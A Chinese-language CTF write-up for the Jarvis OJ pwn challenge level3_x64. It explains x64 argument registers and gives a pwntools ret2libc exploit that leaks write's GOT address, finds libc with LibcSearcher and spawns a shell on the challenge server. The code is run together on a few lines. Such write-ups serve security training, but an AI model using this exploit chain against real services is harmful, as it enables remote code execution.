[Jarvis OJ - PWN]——[XMAN]level3_x64

• 題目地址：https://www.jarvisoj.com/challenges
• 題目：
  
  老樣子，還是先checksec一下，再看看IDA，除了64位以外和[XMAN]level3一樣
  
  
  
  

64位和32位的主要區(qū)別就是參數(shù)方面，64位當(dāng)參數(shù)小于等于六的時候，是放在寄存器中，沒有放在棧上。分別是rdi rsi rdx rcx r8 r9寄存器。所以我們需要找一些pop指令來將參數(shù)寫入寄存器。

雖然沒有找到pop rdx指令，但是這個指令所對應(yīng)的參數(shù)。是限制輸出長度的只要大于8就可以。我們先不管，假設(shè)它大于8。不行的話，一會兒再回來調(diào)整。

exploit

from pwn import * from LibcSearcher import * p=remote("pwn2.jarvisoj.com",9883) elf=ELF("./level3_x64") main_addr=0x040061A pop_rdi = 0x04006b3 pop_rsi = 0x04006b1 write_plt=elf.plt["write"] write_got=elf.got["write"] read_plt=elf.plt["read"]payload = 'a'*(0x80 + 0x8) payload += p64(pop_rdi) + p64(1) payload += p64(pop_rsi) + p64(write_got) + p64(8) payload += p64(write_plt) + p64(main_addr)p.sendlineafter("Input:\n",payload)write_addr = u64(p.recv(8)) log.success("write_addr: "+hex(write_addr)) libc = LibcSearcher('write',write_addr)libc_base=write_addr-libc.dump('write') system_addr=libc_base+libc.dump('system') bin_sh_addr=libc_base+libc.dump('str_bin_sh')payload = 'a'*(0x80 + 0x8) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)p.sendlineafter("Input:\n",payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——[XMAN]level3_x64的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。